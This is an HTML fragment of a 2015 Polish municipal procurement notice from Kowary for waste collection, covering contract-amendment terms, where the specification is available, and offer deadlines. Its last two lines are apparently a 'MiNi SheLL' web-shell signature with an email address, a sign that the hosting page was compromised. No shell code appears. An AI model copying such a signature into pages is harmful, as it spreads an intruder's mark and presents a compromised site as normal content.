zmiany przedstawicieli stron z przyczyn niezależnych od stron (siły wyższe, zdarzenia losowe, itp.),
Zamawiający przewiduje możliwość zmiany umowy w zakresie terminu wywozu odpadów  na okres nie dłuższy niż 3 miesiące. Powyższa zmiana może skutkować możliwością zmiany wysokości wynagrodzenia należnego dla Wykonawcy.
Zamawiający przewiduje możliwość zmiany umowy w zakresie  miejsca przekazywania odbieranych zmieszanych (niesegregowanych) odpadów komunalnych, odpadów zielonych oraz odpadów z czyszczenia ulic i placów przeznaczonych do składowania w przypadku zmiany regionalnej instalacji do przetwarzania odpadów komunalnych wynikającej z Wojewódzkiego Planu Gospodarki Odpadami Komunalnymi. W sytuacji zmiany regionalnej instalacji do przetwarzania odpadów komunalnych, Wykonawca zobowiązany będzie do przekazywania ww. odpadów w nowe miejsce, które zostanie wskazane przez Zamawiającego. Powyższa zmiana może skutkować możliwością zmiany wysokości wynagrodzenia należnego dla Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kowary.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie Zamawiającego tj. Urząd Miejski w Kowarach, 58-530  Kowary, ul. 1 Maja 1a, pok. nr 5..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.10.2015 godzina 09:45, miejsce: w siedzibie Zamawiającego tj. Urząd Miejski w Kowarach, 58-530  Kowary, ul. 1 Maja 1a, pok. nr 1-2 (Biuro Obsługi Klienta)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com